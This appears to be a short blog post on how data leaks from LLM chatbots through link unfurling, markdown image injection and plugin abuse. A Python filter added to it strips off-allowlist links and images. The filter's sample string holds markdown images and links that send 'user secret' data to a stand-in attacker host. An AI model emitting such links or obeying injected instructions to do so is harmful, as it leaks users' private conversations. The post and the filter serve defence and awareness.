Data Exfiltration in Large Language Model Applications

Hello everybody, let’s talk about data exfiltration in large language model applications. Specifically, we’re going to focus on chatbots such as Bing Chat, ChatGPT, and Claude.

There are three categories of ways data can be exfiltrated from these applications: hyperlinks and unfurling, markdown injections, and plugins. Let’s take a closer look at each of these categories.

Hyperlinks and unfurling involve the insertion of hyperlinks into chat conversations. When these hyperlinks are emitted, chat applications like Slack or Microsoft Teams connect to them to retrieve data and display a preview in the chat. Attackers can append additional data to these hyperlinks, allowing them to exfiltrate information from past chat conversations.

Markdown injections work similarly to hyperlinks, but instead of inserting hyperlinks, attackers insert image markdown syntax. Chatbots that support markdown rendering will display the image, which can be used to exfiltrate data from the chat context.

Plugins extend the capabilities of chatbots by allowing them to retrieve data from the internet or read emails. However, these plugins can also be exploited for data exfiltration. Attackers can take control of the conversation and invoke plugins to retrieve and exfiltrate sensitive information.

These vulnerabilities pose a significant risk to data security in large language model applications. It is crucial for developers and vendors to address these issues and implement proper security measures to protect user data.
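One way to close the hyperlink and image-markdown channels described above is to filter model output before it is rendered or passed to a client that unfurls links. The following is an added example, not code from the original post; the allowlisted host `cdn.example.com`, the sample text and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"cdn.example.com"}  # assumption: hosts this app trusts
# Markdown image ![alt](url) or link [text](url); group 1 is "!" for images.
MD_REF = re.compile(r"(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
# Bare URLs, which chat clients auto-link and may unfurl.
BARE_URL = re.compile(r"https?://[^\s<>()\[\]]+", re.I)
# Constructed model output for illustration (not captured from a real system).
SAMPLE = ("Done. ![loading](https://attacker.example/p.png?q=user%20secret) "
          "See [details](https://attacker.example/c?d=abc) and "
          "![logo](https://cdn.example.com/logo.png)")


def host_allowed(url, allowed=ALLOWED_HOSTS):
    """True only for https URLs whose exact host is allowlisted."""
    if "\\" in url:  # browsers read "\" as "/", urlsplit does not
        return False
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
    except ValueError:
        return False
    return parts.scheme == "https" and host in allowed


def sanitize_model_output(text, allowed=ALLOWED_HOSTS):
    """Return (safe_text, findings) for one model response before rendering."""
    findings = []

    def fix_ref(m):
        bang, label, url = m.groups()
        if host_allowed(url, allowed):
            return m.group(0)
        kind = "image" if bang else "link"
        findings.append((kind, url))
        return f"[{kind} removed: {label}]"  # keep label, drop fetchable URL

    def fix_bare(m):
        if host_allowed(m.group(0), allowed):
            return m.group(0)
        findings.append(("url", m.group(0)))
        return "[url removed]"

    # Markdown references first, then any bare URL left in the text.
    return BARE_URL.sub(fix_bare, MD_REF.sub(fix_ref, text)), findings


if __name__ == "__main__":
    print(sanitize_model_output(SAMPLE))
```

The returned findings list can be logged per conversation, so a response that tried to emit an off-allowlist image or link is visible to whoever monitors the application.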

In conclusion, data exfiltration in large language model applications, particularly in chatbots, is a serious concern. The exploitation of hyperlinks and unfurling, markdown injections, and plugins can lead to unauthorized access to and exfiltration of sensitive information. It is essential for developers and users to be aware of these vulnerabilities and take appropriate measures to mitigate the risks.
